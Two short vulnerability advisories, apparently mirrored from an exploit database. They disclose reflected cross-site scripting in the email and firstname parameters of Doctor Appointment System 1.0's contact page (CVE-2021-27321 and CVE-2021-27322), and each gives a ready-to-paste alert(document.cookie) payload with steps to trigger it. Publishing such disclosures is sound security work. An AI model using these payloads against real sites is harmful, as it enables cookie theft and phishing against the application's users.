## https://sploitus.com/exploit?id=PACKETSTORM:161677
# Exploit Title: Doctor Appointment System 1.0 - Reflected POST based Cross Site Scripting (XSS) in email parameter
# Date: 03-03-2021
# CVE: CVE-2021-27321
# Exploit Author: Soham Bakore
# Vendor Homepage:
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Software Link:
https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Version: V1.0
Vulnerable File:
----------------
http://host/doctorappointment/contactus.php
<http://host/patient/search_result.php>
Vulnerable Issue:
-----------------
email parameter has no input validation
POC:
----
1] Navigate to http://host/doctorappointment/contactus.php
2] In the email parameter enter following payload to execute arbitrary javascript code : '</script><svg/onload=alert(document.cookie)>
3] This can be used to steal cookies or perform phishing attacks on the web application
------------------------------------------
# Exploit Title: Doctor Appointment System 1.0 - Reflected POST based Cross Site Scripting (XSS) in firstname parameter
# Date: 03-03-2021
# CVE: CVE-2021-27322
# Exploit Author: Nakul Ratti
# Vendor Homepage: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Software Link: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Version: V1.0
Vulnerable File:
----------------
http://host/doctorappointment/contactus.php
<http://host/patient/search_result.php>
Vulnerable Issue:
-----------------
firstname parameter has no input validation
POC:
----
1] Navigate to http://host/doctorappointment/contactus.php
2] In the firstname parameter enter following payload to execute arbitrary javascript code : '</script><svg/onload=alert(document.cookie)>
3] This can be used to steal cookies or perform phishing attacks on the web application